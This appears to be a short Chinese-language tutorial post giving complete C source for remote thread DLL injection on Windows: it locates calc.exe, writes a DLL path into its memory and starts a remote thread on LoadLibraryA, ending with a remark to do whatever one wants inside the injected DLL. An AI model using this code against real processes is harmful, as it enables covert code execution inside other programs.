远程线程注入 c语言实现

/************************************************************************//* 云守护email:542335496@qq.com                                                                     *//************************************************************************/#include <windows.h>#include <stdio.h>#include <tlhelp32.h>/**函数：创建远程线程，使其加载DLL*参数：dwProcessId是要创建远程线程的进程ID*      lpszDllName是DLL的名字*/BOOL LoadDll(DWORD dwProcessId,LPTSTR lpszDllName){HANDLEhProcess= NULL;HANDLEhThread= NULL;PSTRpszDllFile= NULL;// 打开进程hProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,dwProcessId);if(hProcess == NULL)return FALSE;printf("打开进程 %d 成功!\n\n",dwProcessId);// 分配远程空间int cch = 1 + strlen(lpszDllName);pszDllFile = (PSTR)VirtualAllocEx(hProcess,NULL,cch,MEM_COMMIT,PAGE_READWRITE);if(pszDllFile == NULL)return FALSE;printf("分配远程空间成功!\n\n");// 把DLL的名字变量地址写入到远程空间中if((WriteProcessMemory(hProcess,(PVOID)pszDllFile,(PVOID)lpszDllName,cch,NULL)) == FALSE){return FALSE;}printf("写远程内存成功!\n\n");// 获取远程进程地址空间中LoadLibrary函数的地址PTHREAD_START_ROUTINE pfnThreadRtn = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle("kernel32"),"LoadLibraryA");if(pfnThreadRtn == NULL)return FALSE;printf("获取LoadLibrary函数地址成功!\n\n");// 创建远程线程hThread = CreateRemoteThread(hProcess,NULL,0,pfnThreadRtn,(PVOID)pszDllFile,0,NULL);if(hThread == NULL)return FALSE;printf("创建远程线程成功!\n\n");// 等待远程线程执行结束，并非必要system("pause");WaitForSingleObject(hThread,INFINITE);VirtualFreeEx(hProcess,(PVOID)pszDllFile,0,MEM_RELEASE);CloseHandle(hThread);CloseHandle(hProcess);return TRUE;}void main(){char lpDllName[MAX_PATH] = TEXT("mydll.dll");// 枚举进程，得到指定进程IDPROCESSENTRY32 ProcessEntry = { 0 };HANDLE hProcessSnap;ProcessEntry.dwSize = sizeof(PROCESSENTRY32);hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);BOOL bRet = Process32First(hProcessSnap,&ProcessEntry);while(bRet){// 判断进程是否为 calc.exe,注入计算器进程if(strcmp("calc.exe",ProcessEntry.szExeFile) == 0){LoadDll(ProcessEntry.th32ProcessID,lpDllName);break;}bRet = Process32Next(hProcessSnap,&ProcessEntry);}}

//在自己写的mydll.dll做你想做的事情。。